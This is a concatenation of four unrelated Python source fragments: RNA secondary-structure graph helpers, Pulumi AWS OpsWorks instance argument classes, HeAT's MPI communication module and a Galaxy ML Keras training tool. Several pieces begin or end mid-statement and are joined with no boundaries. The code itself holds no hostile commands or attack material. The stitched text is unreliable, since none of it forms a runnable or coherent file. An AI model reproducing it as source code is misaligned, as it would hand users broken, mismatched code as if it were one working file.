indicating the side of e1 adjacent to e2 and the side of e2 adjacent to e1 """ if e1[0] == 's': return self.get_sides(e1, e2) elif e2[0] == 's': return self.get_sides(e2, e1)[::-1] return None def get_sides(self, s1, b): """ Get the side of s1 that is next to b. s1e -> s1b -> b :param s1: The stem. :param b: The bulge. :return: A tuple indicating which side is the one next to the bulge and which is away from the bulge. """ s1d = self.defines[s1] bd = self.defines[b] # if the bulge is a length 0, multiloop then use the adjacent # stem to determine its side if len(bd) == 0: edges = self.edges[b] for e in edges: if e != s1: bd = self.defines[e] break for i in xrange(4): for k in xrange(len(bd)): if s1d[i] - bd[k] == 1: if i == 0: s1b = 0 break if i == 2: s1b = 1 break elif s1d[i] - bd[k] == -1: if i == 1: s1b = 1 break if i == 3: s1b = 0 break if s1b == 0: s1e = 1 else: s1e = 0 return (s1b, s1e) def get_sides_plus(self, s1, b): """ Get the side of s1 that is next to b. s1e -> s1b -> b :param s1: The stem. :param b: The bulge. :return: A tuple indicating the corner of the stem that connects to the bulge as well as the corner of the bulge that connects to the stem. """ s1d = self.defines[s1] bd = self.defines[b] if len(bd) == 0: edges = self.edges[b] for e in edges: if e != s1: bd = self.defines[e] break for k in xrange(len(bd)): # before the stem on the 5' strand if s1d[0] - bd[k] == 1: return (0, k) # after the stem on the 5' strand elif bd[k] - s1d[1] == 1: return (1, k) # before the stem on the 3' strand elif s1d[2] - bd[k] == 1: return (2, k) # after the stem on the 3' strand elif bd[k] - s1d[3] == 1: return (3, k) raise Exception("Faulty multiloop %s connecting %s" % (" ".join(map(str, bd)), " ".join(map(str, s1d)))) def stem_side_vres_to_resn(self, stem, side, vres): """ Return the residue number given the stem name, the strand (side) it's on and the virtual residue number. """ d = self.defines[stem] if side == 0: return d[0] + vres else: return d[3] - vres def stem_iterator(self): """ Iterator over all of the stems in the structure. """ for d in self.defines.keys(): if d[0] == 's': yield d def hloop_iterator(self): """ Iterator over all of the hairpin in the structure. """ for d in self.defines.keys(): if d[0] == 'h': yield d def mloop_iterator(self): """ Iterator over all of the multiloops in the structure. """ for d in self.defines.keys(): if d[0] == 'm': yield d def iloop_iterator(self): """ Iterator over all of the interior loops in the structure. """ for d in self.defines.keys(): if d[0] == 'i': yield d def floop_iterator(self): """ Yield the name of the 5' prime unpaired region if it is present in the structure. """ if 'f1' in self.defines.keys(): yield 'f1'
-> Optional[pulumi.Input[str]]: return pulumi.get(self, "reported_os_version") @reported_os_version.setter def reported_os_version(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "reported_os_version", value) @property @pulumi.getter(name="rootBlockDevices") def root_block_devices(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['InstanceRootBlockDeviceArgs']]]]: """ Customize details about the root block device of the instance. See Block Devices below for details. """ return pulumi.get(self, "root_block_devices") @root_block_devices.setter def root_block_devices(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['InstanceRootBlockDeviceArgs']]]]): pulumi.set(self, "root_block_devices", value) @property @pulumi.getter(name="rootDeviceType") def root_device_type(self) -> Optional[pulumi.Input[str]]: """ Name of the type of root device instances will have by default. Can be either `"ebs"` or `"instance-store"` """ return pulumi.get(self, "root_device_type") @root_device_type.setter def root_device_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "root_device_type", value) @property @pulumi.getter(name="rootDeviceVolumeId") def root_device_volume_id(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "root_device_volume_id") @root_device_volume_id.setter def root_device_volume_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "root_device_volume_id", value) @property @pulumi.getter(name="securityGroupIds") def security_group_ids(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ The associated security groups. """ return pulumi.get(self, "security_group_ids") @security_group_ids.setter def security_group_ids(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "security_group_ids", value) @property @pulumi.getter(name="sshHostDsaKeyFingerprint") def ssh_host_dsa_key_fingerprint(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "ssh_host_dsa_key_fingerprint") @ssh_host_dsa_key_fingerprint.setter def ssh_host_dsa_key_fingerprint(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ssh_host_dsa_key_fingerprint", value) @property @pulumi.getter(name="sshHostRsaKeyFingerprint") def ssh_host_rsa_key_fingerprint(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "ssh_host_rsa_key_fingerprint") @ssh_host_rsa_key_fingerprint.setter def ssh_host_rsa_key_fingerprint(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ssh_host_rsa_key_fingerprint", value) @property @pulumi.getter(name="sshKeyName") def ssh_key_name(self) -> Optional[pulumi.Input[str]]: """ Name of the SSH keypair that instances will have by default. """ return pulumi.get(self, "ssh_key_name") @ssh_key_name.setter def ssh_key_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "ssh_key_name", value) @property @pulumi.getter(name="stackId") def stack_id(self) -> Optional[pulumi.Input[str]]: """ The id of the stack the instance will belong to. """ return pulumi.get(self, "stack_id") @stack_id.setter def stack_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "stack_id", value) @property @pulumi.getter def state(self) -> Optional[pulumi.Input[str]]: """ The desired state of the instance. Can be either `"running"` or `"stopped"`. """ return pulumi.get(self, "state") @state.setter def state(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "state", value) @property @pulumi.getter def status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, "status") @status.setter def status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "status", value) @property @pulumi.getter(name="subnetId") def subnet_id(self) -> Optional[pulumi.Input[str]]: """ Subnet ID to attach to """ return pulumi.get(self, "subnet_id") @subnet_id.setter def subnet_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "subnet_id", value) @property @pulumi.getter def tenancy(self) -> Optional[pulumi.Input[str]]: """ Instance tenancy to use. Can be one of `"default"`, `"dedicated"` or `"host"` """ return pulumi.get(self, "tenancy") @tenancy.setter def tenancy(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenancy", value) @property @pulumi.getter(name="virtualizationType") def virtualization_type(self) -> Optional[pulumi.Input[str]]: """ Keyword to choose what virtualization mode created instances will use. Can be either `"paravirtual"` or `"hvm"`. """ return pulumi.get(self, "virtualization_type") @virtualization_type.setter def virtualization_type(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "virtualization_type", value) class Instance(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, agent_version: Optional[pulumi.Input[str]] = None, ami_id: Optional[pulumi.Input[str]] = None, architecture: Optional[pulumi.Input[str]] = None, auto_scaling_type: Optional[pulumi.Input[str]] = None, availability_zone: Optional[pulumi.Input[str]] = None, created_at: Optional[pulumi.Input[str]] = None, delete_ebs: Optional[pulumi.Input[bool]] = None, delete_eip: Optional[pulumi.Input[bool]] = None, ebs_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEbsBlockDeviceArgs']]]]] = None, ebs_optimized: Optional[pulumi.Input[bool]] = None, ecs_cluster_arn: Optional[pulumi.Input[str]] = None, elastic_ip: Optional[pulumi.Input[str]] = None, ephemeral_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEphemeralBlockDeviceArgs']]]]] = None, hostname: Optional[pulumi.Input[str]] = None, infrastructure_class: Optional[pulumi.Input[str]] = None, install_updates_on_boot: Optional[pulumi.Input[bool]] = None, instance_profile_arn: Optional[pulumi.Input[str]] = None, instance_type: Optional[pulumi.Input[str]] = None, last_service_error_id: Optional[pulumi.Input[str]] = None, layer_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, os: Optional[pulumi.Input[str]] = None, platform: Optional[pulumi.Input[str]] = None, private_dns: Optional[pulumi.Input[str]] = None, private_ip: Optional[pulumi.Input[str]] = None, public_dns: Optional[pulumi.Input[str]] = None, public_ip: Optional[pulumi.Input[str]] = None, registered_by: Optional[pulumi.Input[str]] = None, reported_agent_version: Optional[pulumi.Input[str]] = None, reported_os_family: Optional[pulumi.Input[str]] = None, reported_os_name: Optional[pulumi.Input[str]] = None, reported_os_version: Optional[pulumi.Input[str]] = None, root_block_devices: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceRootBlockDeviceArgs']]]]] = None, root_device_type: Optional[pulumi.Input[str]] = None, root_device_volume_id: Optional[pulumi.Input[str]] = None, security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, ssh_host_dsa_key_fingerprint: Optional[pulumi.Input[str]] = None, ssh_host_rsa_key_fingerprint: Optional[pulumi.Input[str]] = None, ssh_key_name: Optional[pulumi.Input[str]] = None, stack_id: Optional[pulumi.Input[str]] = None, state: Optional[pulumi.Input[str]] = None, status: Optional[pulumi.Input[str]] = None, subnet_id: Optional[pulumi.Input[str]] = None, tenancy: Optional[pulumi.Input[str]] = None, virtualization_type: Optional[pulumi.Input[str]] = None, __props__=None): """ Provides an OpsWorks instance resource. ## Example Usage ```python import pulumi import pulumi_aws as aws my_instance = aws.opsworks.Instance("my-instance", stack_id=aws_opsworks_stack["main"]["id"], layer_ids=[aws_opsworks_custom_layer["my-layer"]["id"]], instance_type="t2.micro", os="Amazon Linux 2015.09", state="stopped") ``` ## Block devices Each of the `*_block_device` attributes controls a portion of the AWS Instance's "Block Device Mapping". It's a good idea to familiarize yourself with [AWS's Block Device Mapping docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/block-device-mapping-concepts.html) to understand the implications of using these attributes. The `root_block_device` mapping supports the following: * `volume_type` - (Optional) The type of volume. Can be `"standard"`, `"gp2"`, or `"io1"`. (Default: `"standard"`). * `volume_size` - (Optional) The size of the volume in gigabytes. * `iops` - (Optional) The amount of provisioned [IOPS](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`. * `delete_on_termination` - (Optional) Whether the volume should be destroyed on instance termination (Default: `true`). Modifying any of the `root_block_device` settings requires resource replacement. Each `ebs_block_device` supports the following: * `device_name` - The name of the device to mount. * `snapshot_id` - (Optional) The Snapshot ID to mount. * `volume_type` - (Optional) The type of volume. Can be `"standard"`, `"gp2"`, or `"io1"`. (Default: `"standard"`). * `volume_size` - (Optional) The size of the volume in gigabytes. * `iops` - (Optional) The amount of provisioned [IOPS](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ebs-io-characteristics.html). This must be set with a `volume_type` of `"io1"`. * `delete_on_termination` - (Optional) Whether the volume should be destroyed on instance termination (Default: `true`). Modifying any `ebs_block_device` currently requires resource replacement. Each `ephemeral_block_device` supports the following: * `device_name` - The name of the block device to mount on the instance. * `virtual_name` - The [Instance Store Device Name](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#InstanceStoreDeviceNames) (e.g. `"ephemeral0"`) Each AWS Instance type has a different set of Instance Store block devices available for attachment. AWS [publishes a list](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/InstanceStorage.html#StorageOnInstanceTypes) of which ephemeral devices are available on each type. The devices are always identified by the `virtual_name` in the format `"ephemeral{0..N}"`. > **NOTE:** Currently, changes to `*_block_device` configuration of _existing_ resources cannot be automatically detected by this provider. After making updates to block device configuration, resource recreation can be manually triggered by using the [`up` command with the --replace argument](https://www.pulumi.com/docs/reference/cli/pulumi_up/). ## Import Opsworks Instances can be imported using the `instance id`, e.g. ```sh $ pulumi import aws:opsworks/instance:Instance my_instance 4d6d1710-ded9-42a1-b08e-b043ad7af1e2 ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[str] agent_version: The AWS OpsWorks agent to install. Defaults to `"INHERIT"`. :param pulumi.Input[str] ami_id: The AMI to use for the instance. If an AMI is specified, `os` must be `"Custom"`. :param pulumi.Input[str] architecture: Machine architecture for created instances. Can be either `"x86_64"` (the default) or `"i386"` :param pulumi.Input[str] auto_scaling_type: Creates load-based or time-based instances. If set, can be either: `"load"` or `"timer"`. :param pulumi.Input[str] availability_zone: Name of the availability zone where instances will be created by default. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEbsBlockDeviceArgs']]]] ebs_block_devices: Additional EBS block devices to attach to the instance. See Block Devices below for details. :param pulumi.Input[bool] ebs_optimized: If true, the launched EC2 instance will be EBS-optimized. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceEphemeralBlockDeviceArgs']]]] ephemeral_block_devices: Customize Ephemeral (also known as "Instance Store") volumes on the instance. See Block Devices below for details. :param pulumi.Input[str] hostname: The instance's host name. :param pulumi.Input[bool] install_updates_on_boot: Controls where to install OS and package updates when the instance boots. Defaults to `true`. :param pulumi.Input[str] instance_type: The type of instance to start :param pulumi.Input[Sequence[pulumi.Input[str]]] layer_ids: The ids of the layers the instance will belong to. :param pulumi.Input[str] os: Name of operating system that will be installed. :param pulumi.Input[str] private_dns: The private DNS name assigned to the instance. Can only be used inside the Amazon EC2, and only available if you've enabled DNS hostnames for your VPC :param pulumi.Input[str] private_ip: The private IP address assigned to the instance :param pulumi.Input[str] public_dns: The public DNS name assigned to the instance. For EC2-VPC, this is only available if you've enabled DNS hostnames for your VPC :param pulumi.Input[str] public_ip: The public IP address assigned to the instance, if applicable. :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['InstanceRootBlockDeviceArgs']]]] root_block_devices: Customize details about the root block device of the instance. See Block Devices below for details. :param pulumi.Input[str] root_device_type: Name of the type of root device instances will have by default. Can be either `"ebs"` or `"instance-store"` :param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: The associated security groups. :param pulumi.Input[str] ssh_key_name: Name of the SSH keypair that instances will have by default. :param pulumi.Input[str] stack_id: The id of the stack the instance will belong to. :param pulumi.Input[str] state: The desired state of the instance. Can be either `"running"` or `"stopped"`. :param pulumi.Input[str] subnet_id: Subnet ID to attach
""" Module implementing the communication layer of HeAT """ from __future__ import annotations import numpy as np import os import subprocess import torch from mpi4py import MPI from typing import Any, Callable, Optional, List, Tuple, Union from .stride_tricks import sanitize_axis CUDA_AWARE_MPI = False # check whether OpenMPI support CUDA-aware MPI if "openmpi" in os.environ.get("MPI_SUFFIX", "").lower(): buffer = subprocess.check_output(["ompi_info", "--parsable", "--all"]) CUDA_AWARE_MPI = b"mpi_built_with_cuda_support:value:true" in buffer # MVAPICH CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("MV2_USE_CUDA") == "1" # MPICH CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("MPIR_CVAR_ENABLE_HCOLL") == "1" # ParaStationMPI CUDA_AWARE_MPI = CUDA_AWARE_MPI or os.environ.get("PSP_CUDA") == "1" class MPIRequest: """ Represents a handle on a non-blocking operation Parameters ---------- handle: MPI.Communicator Handle for the mpi4py Communicator sendbuf: DNDarray or torch.Tensor or Any The buffer for the data to be send recvbuf: DNDarray or torch.Tensor or Any The buffer to the receive data tensor: torch.Tensor Internal Data permutation: Tuple[int,...] Permutation of the tensor axes """ def __init__( self, handle, sendbuf: Union[DNDarray, torch.Tensor, Any] = None, recvbuf: Union[DNDarray, torch.Tensor, Any] = None, tensor: torch.Tensor = None, permutation: Tuple[int, ...] = None, ): self.handle = handle self.tensor = tensor self.recvbuf = recvbuf self.sendbuf = sendbuf self.permutation = permutation def Wait(self, status: MPI.Status = None): """ Waits for an MPI request to complete """ self.handle.Wait(status) if ( self.tensor is not None and isinstance(self.tensor, torch.Tensor) and self.tensor.is_cuda and not CUDA_AWARE_MPI ): if self.permutation is not None: self.recvbuf = self.recvbuf.permute(self.permutation) self.tensor.copy_(self.recvbuf) def __getattr__(self, name: str) -> Callable: """ Default pass-through for the communicator methods. Parameters ---------- name : str The name of the method to be called. """ return getattr(self.handle, name) class Communication: """ Base class for Communications (inteded for other backends) """ @staticmethod def is_distributed() -> NotImplementedError: """ Whether or not the Communication is distributed """ raise NotImplementedError() def __init__(self) -> NotImplementedError: raise NotImplementedError() def chunk(self, shape, split) -> NotImplementedError: """ Calculates the chunk of data that will be assigned to this compute node given a global data shape and a split axis. Returns ``(offset, local_shape, slices)``: the offset in the split dimension, the resulting local shape if the global input shape is chunked on the split axis and the chunk slices with respect to the given shape Parameters ---------- shape : Tuple[int,...] The global shape of the data to be split split : int The axis along which to chunk the data """ raise NotImplementedError() class MPICommunication(Communication): """ Class encapsulating all MPI Communication Parameters ---------- handle: MPI.Communicator Handle for the mpi4py Communicator """ __mpi_type_mappings = { torch.bool: MPI.BOOL, torch.uint8: MPI.UNSIGNED_CHAR, torch.int8: MPI.SIGNED_CHAR, torch.int16: MPI.SHORT, torch.int32: MPI.INT, torch.int64: MPI.LONG, torch.bfloat16: MPI.INT16_T, torch.float16: MPI.INT16_T, torch.float32: MPI.FLOAT, torch.float64: MPI.DOUBLE, torch.complex64: MPI.COMPLEX, torch.complex128: MPI.DOUBLE_COMPLEX, } def __init__(self, handle=MPI.COMM_WORLD): self.handle = handle try: self.rank = handle.Get_rank() self.size = handle.Get_size() except MPI.Exception: # ranks not within the group will fail with an MPI.Exception, this is expected self.rank = None self.size = None def is_distributed(self) -> bool: """ Determines whether the communicator is distributed, i.e. handles more than one node. """ return self.size > 1 def chunk( self, shape: Tuple[int], split: int, rank: int = None, w_size: int = None ) -> Tuple[int, Tuple[int], Tuple[slice]]: """ Calculates the chunk of data that will be assigned to this compute node given a global data shape and a split axis. Returns ``(offset, local_shape, slices)``: the offset in the split dimension, the resulting local shape if the global input shape is chunked on the split axis and the chunk slices with respect to the given shape Parameters ---------- shape : Tuple[int,...] The global shape of the data to be split split : int The axis along which to chunk the data rank : int, optional Process for which the chunking is calculated for, defaults to ``self.rank``. Intended for creating chunk maps without communication w_size : int, optional The MPI world size, defaults to ``self.size``. Intended for creating chunk maps without communication """ # ensure the split axis is valid, we actually do not need it split = sanitize_axis(shape, split) if split is None: return 0, shape, tuple(slice(0, end) for end in shape) rank = self.rank if rank is None else rank w_size = self.size if w_size is None else w_size if not isinstance(rank, int) or not isinstance(w_size, int): raise TypeError("rank and size must be integers") dims = len(shape) size = shape[split] chunk = size // w_size remainder = size % w_size if remainder > rank: chunk += 1 start = rank * chunk else: start = rank * chunk + remainder end = start + chunk return ( start, tuple(shape[i] if i != split else end - start for i in range(dims)), tuple(slice(0, shape[i]) if i != split else slice(start, end) for i in range(dims)), ) def counts_displs_shape( self, shape: Tuple[int], axis: int ) -> Tuple[Tuple[int], Tuple[int], Tuple[int]]: """ Calculates the item counts, displacements and output shape for a variable sized all-to-all MPI-call (e.g. ``MPI_Alltoallv``). The passed shape is regularly chunk along the given axis and for all nodes. Parameters ---------- shape : Tuple[int,...] The object for which to calculate the chunking. axis : int The axis along which the chunking is performed. """ # the elements send/received by all nodes counts = torch.full((self.size,), shape[axis] // self.size) counts[: shape[axis] % self.size] += 1 # the displacements into the buffer displs = torch.zeros((self.size,), dtype=counts.dtype) torch.cumsum(counts[:-1], out=displs[1:], dim=0) # helper that calculates the output shape for a receiving buffer under the assumption all nodes have an equally # sized input compared to this node output_shape = list(shape) output_shape[axis] = self.size * counts[self.rank].item() return tuple(counts.tolist()), tuple(displs.tolist()), tuple(output_shape) @classmethod def mpi_type_and_elements_of( cls, obj: Union[DNDarray, torch.Tensor], counts: Tuple[int], displs: Tuple[int] ) -> Tuple[MPI.Datatype, Tuple[int, ...]]: """ Determines the MPI data type and number of respective elements for the given tensor (:class:`~heat.core.dndarray.DNDarray` or ``torch.Tensor). In case the tensor is contiguous in memory, a native MPI data type can be used. Otherwise, a derived data type is automatically constructed using the storage information of the passed object. Parameters ---------- obj : DNDarray or torch.Tensor The object for which to construct the MPI data type and number of elements counts : Tuple[ints,...], optional Optional counts arguments for variable MPI-calls (e.g. Alltoallv) displs : Tuple[ints,...], optional Optional displacements arguments for variable MPI-calls (e.g. Alltoallv) # ToDo: The option to explicitely specify the counts and displacements to be send still needs propper implementation """ mpi_type, elements = cls.__mpi_type_mappings[obj.dtype], torch.numel(obj) # simple case, continuous memory can be transmitted as is if obj.is_contiguous(): if counts is None: return mpi_type, elements else: factor = np.prod(obj.shape[1:]) return ( mpi_type, ( tuple(factor * ele for ele in counts), (tuple(factor * ele for ele in displs)), ), ) # non-continuous memory, e.g. after a transpose, has to be packed in derived MPI types elements = obj.shape[0] shape = obj.shape[1:] strides = [1] * len(shape) strides[0] = obj.stride()[-1] strides = strides[::-1] offsets = [obj.element_size() * stride for stride in obj.stride()[:-1]] # chain the types based on the for i in range(len(shape) - 1, -1, -1): mpi_type = mpi_type.Create_vector(shape[i], 1, strides[i]).Create_resized(0, offsets[i]) mpi_type.Commit() if counts is not None: return mpi_type, (counts, displs) return mpi_type, elements @classmethod def as_mpi_memory(cls, obj) -> MPI.memory: """ Converts the passed ``torch.Tensor`` into an MPI compatible memory view. Parameters ---------- obj : torch.Tensor The tensor to be converted into a MPI memory view. """ return MPI.memory.fromaddress(obj.data_ptr(), 0) @classmethod def as_buffer( cls, obj: torch.Tensor, counts: Tuple[int] = None, displs: Tuple[int] = None ) -> List[Union[MPI.memory, Tuple[int, int], MPI.Datatype]]: """ Converts a passed ``torch.Tensor`` into a memory buffer object with associated number of elements and MPI data type. Parameters ---------- obj : torch.Tensor The object to be converted into a buffer representation. counts : Tuple[int,...], optional Optional counts arguments for variable MPI-calls (e.g. Alltoallv) displs : Tuple[int,...], optional Optional displacements arguments for variable MPI-calls (e.g. Alltoallv) """ squ = False if not obj.is_contiguous() and obj.ndim == 1: # this makes the math work below this function. obj.unsqueeze_(-1) squ = True mpi_type, elements = cls.mpi_type_and_elements_of(obj, counts, displs) mpi_mem
<filename>galaxy_ml/tools/keras_train_and_eval.py<gh_stars>0 import argparse import joblib import json import numpy as np import os import pandas as pd import warnings from itertools import chain from scipy.io import mmread from sklearn.pipeline import Pipeline from sklearn.metrics._scorer import _check_multimetric_scoring from sklearn.model_selection._validation import _score from sklearn.utils import indexable, _safe_indexing from galaxy_ml.model_validations import train_test_split from galaxy_ml.keras_galaxy_models import (_predict_generator, KerasGBatchClassifier) from galaxy_ml.model_persist import load_model_from_h5, dump_model_to_h5 from galaxy_ml.utils import (SafeEval, clean_params, gen_compute_scores, get_main_estimator, get_scoring, get_module, read_columns) N_JOBS = int(os.environ.get('GALAXY_SLOTS', 1)) CACHE_DIR = os.path.join(os.getcwd(), 'cached') del os NON_SEARCHABLE = ('n_jobs', 'pre_dispatch', 'memory', '_path', '_dir', 'nthread', 'callbacks') ALLOWED_CALLBACKS = ('EarlyStopping', 'TerminateOnNaN', 'ReduceLROnPlateau', 'CSVLogger', 'None') def _eval_swap_params(params_builder): swap_params = {} for p in params_builder['param_set']: swap_value = p['sp_value'].strip() if swap_value == '': continue param_name = p['sp_name'] if param_name.lower().endswith(NON_SEARCHABLE): warnings.warn("Warning: `%s` is not eligible for search and was " "omitted!" % param_name) continue if not swap_value.startswith(':'): safe_eval = SafeEval(load_scipy=True, load_numpy=True) ev = safe_eval(swap_value) else: # Have `:` before search list, asks for estimator evaluatio safe_eval_es = SafeEval(load_estimators=True) swap_value = swap_value[1:].strip() # TODO maybe add regular express check ev = safe_eval_es(swap_value) swap_params[param_name] = ev return swap_params def train_test_split_none(*arrays, **kwargs): """extend train_test_split to take None arrays and support split by group names. """ nones = [] new_arrays = [] for idx, arr in enumerate(arrays): if arr is None: nones.append(idx) else: new_arrays.append(arr) if kwargs['shuffle'] == 'None': kwargs['shuffle'] = None group_names = kwargs.pop('group_names', None) if group_names is not None and group_names.strip(): group_names = [name.strip() for name in group_names.split(',')] new_arrays = indexable(*new_arrays) groups = kwargs['labels'] n_samples = new_arrays[0].shape[0] index_arr = np.arange(n_samples) test = index_arr[np.isin(groups, group_names)] train = index_arr[~np.isin(groups, group_names)] rval = list(chain.from_iterable( (_safe_indexing(a, train), _safe_indexing(a, test)) for a in new_arrays)) else: rval = train_test_split(*new_arrays, **kwargs) for pos in nones: rval[pos * 2: 2] = [None, None] return rval def _evaluate_keras_and_sklearn_scores(estimator, data_generator, X, y=None, sk_scoring=None, steps=None, batch_size=32, return_predictions=False): """output scores for bother keras and sklearn metrics Parameters ----------- estimator : object Fitted `galaxy_ml.keras_galaxy_models.KerasGBatchClassifier`. data_generator : object From `galaxy_ml.preprocessors.ImageDataFrameBatchGenerator`. X : 2-D array Contains indecies of images that need to be evaluated. y : None Target value. sk_scoring : dict Galaxy tool input parameters. steps : integer or None Evaluation/prediction steps before stop. batch_size : integer Number of samples in a batch return_predictions : bool, default is False Whether to return predictions and true labels. """ scores = {} generator = data_generator.flow(X, y=y, batch_size=batch_size) # keras metrics evaluation # handle scorer, convert to scorer dict generator.reset() score_results = estimator.model_.evaluate_generator(generator, steps=steps) metrics_names = estimator.model_.metrics_names if not isinstance(metrics_names, list): scores[metrics_names] = score_results else: scores = dict(zip(metrics_names, score_results)) if sk_scoring['primary_scoring'] == 'default' and\ not return_predictions: return scores generator.reset() predictions, y_true = _predict_generator(estimator.model_, generator, steps=steps) # for sklearn metrics if sk_scoring['primary_scoring'] != 'default': scorer = get_scoring(sk_scoring) if not isinstance(scorer, (dict, list)): scorer = [sk_scoring['primary_scoring']] scorer = _check_multimetric_scoring(estimator, scoring=scorer) sk_scores = gen_compute_scores(y_true, predictions, scorer) scores.update(sk_scores) if return_predictions: return scores, predictions, y_true else: return scores, None, None def main(inputs, infile_estimator, infile1, infile2, outfile_result, outfile_object=None, outfile_y_true=None, outfile_y_preds=None, groups=None, ref_seq=None, intervals=None, targets=None, fasta_path=None): """ Parameter --------- inputs : str File path to galaxy tool parameter. infile_estimator : str File path to estimator. infile1 : str File path to dataset containing features. infile2 : str File path to dataset containing target values. outfile_result : str File path to save the results, either cv_results or test result. outfile_object : str, optional File path to save searchCV object. outfile_y_true : str, optional File path to target values for prediction. outfile_y_preds : str, optional File path to save predictions. groups : str File path to dataset containing groups labels. ref_seq : str File path to dataset containing genome sequence file. intervals : str File path to dataset containing interval file. targets : str File path to dataset compressed target bed file. fasta_path : str File path to dataset containing fasta file. """ warnings.simplefilter('ignore') with open(inputs, 'r') as param_handler: params = json.load(param_handler) # load estimator estimator = load_model_from_h5(infile_estimator) estimator = clean_params(estimator) # swap hyperparameter swapping = params['experiment_schemes']['hyperparams_swapping'] swap_params = _eval_swap_params(swapping) estimator.set_params(**swap_params) estimator_params = estimator.get_params() # store read dataframe object loaded_df = {} input_type = params['input_options']['selected_input'] # tabular input if input_type == 'tabular': header = 'infer' if params['input_options']['header1'] else None column_option = (params['input_options']['column_selector_options_1'] ['selected_column_selector_option']) if column_option in ['by_index_number', 'all_but_by_index_number', 'by_header_name', 'all_but_by_header_name']: c = params['input_options']['column_selector_options_1']['col1'] else: c = None df_key = infile1 + repr(header) df = pd.read_csv(infile1, sep='\t', header=header, parse_dates=True) loaded_df[df_key] = df X = read_columns(df, c=c, c_option=column_option).astype(float) # sparse input elif input_type == 'sparse': X = mmread(open(infile1, 'r')) # fasta_file input elif input_type == 'seq_fasta': pyfaidx = get_module('pyfaidx') sequences = pyfaidx.Fasta(fasta_path) n_seqs = len(sequences.keys()) X = np.arange(n_seqs)[:, np.newaxis] for param in estimator_params.keys(): if param.endswith('fasta_path'): estimator.set_params( **{param: fasta_path}) break else: raise ValueError( "The selected estimator doesn't support " "fasta file input! Please consider using " "KerasGBatchClassifier with " "FastaDNABatchGenerator/FastaProteinBatchGenerator " "or having GenomeOneHotEncoder/ProteinOneHotEncoder " "in pipeline!") elif input_type == 'refseq_and_interval': path_params = { 'data_batch_generator__ref_genome_path': ref_seq, 'data_batch_generator__intervals_path': intervals, 'data_batch_generator__target_path': targets } estimator.set_params(**path_params) n_intervals = sum(1 for line in open(intervals)) X = np.arange(n_intervals)[:, np.newaxis] # Get target y header = 'infer' if params['input_options']['header2'] else None column_option = (params['input_options']['column_selector_options_2'] ['selected_column_selector_option2']) if column_option in ['by_index_number', 'all_but_by_index_number', 'by_header_name', 'all_but_by_header_name']: c = params['input_options']['column_selector_options_2']['col2'] else: c = None df_key = infile2 + repr(header) if df_key in loaded_df: infile2 = loaded_df[df_key] else: infile2 = pd.read_csv(infile2, sep='\t', header=header, parse_dates=True) loaded_df[df_key] = infile2 y = read_columns( infile2, c=c, c_option=column_option, sep='\t', header=header, parse_dates=True) if len(y.shape) == 2 and y.shape[1] == 1: y = y.ravel() if input_type == 'refseq_and_interval': estimator.set_params( data_batch_generator__features=y.ravel().tolist()) y = None # end y # load groups if groups: groups_selector = (params['experiment_schemes']['test_split'] ['split_algos']).pop('groups_selector') header = 'infer' if groups_selector['header_g'] else None column_option = \ (groups_selector['column_selector_options_g'] ['selected_column_selector_option_g']) if column_option in ['by_index_number', 'all_but_by_index_number', 'by_header_name', 'all_but_by_header_name']: c = groups_selector['column_selector_options_g']['col_g'] else: c = None df_key = groups + repr(header) if df_key in loaded_df: groups = loaded_df[df_key] groups = read_columns( groups, c=c, c_option=column_option, sep='\t', header=header, parse_dates=True) groups = groups.ravel() # del loaded_df del loaded_df # cache iraps_core fits could increase search speed significantly memory = joblib.Memory(location=CACHE_DIR, verbose=0) main_est = get_main_estimator(estimator) if main_est.__class__.__name__ == 'IRAPSClassifier': main_est.set_params(memory=memory) # handle scorer, convert to scorer dict scoring = params['experiment_schemes']['metrics']['scoring'] scorer = get_scoring(scoring) if not isinstance(scorer, (dict, list)): scorer = [scoring['primary_scoring']] scorer = _check_multimetric_scoring(estimator, scoring=scorer) # handle test (first) split test_split_options = (params['experiment_schemes'] ['test_split']['split_algos']) if test_split_options['shuffle'] == 'group': test_split_options['labels'] = groups if test_split_options['shuffle'] == 'stratified': if y is not None: 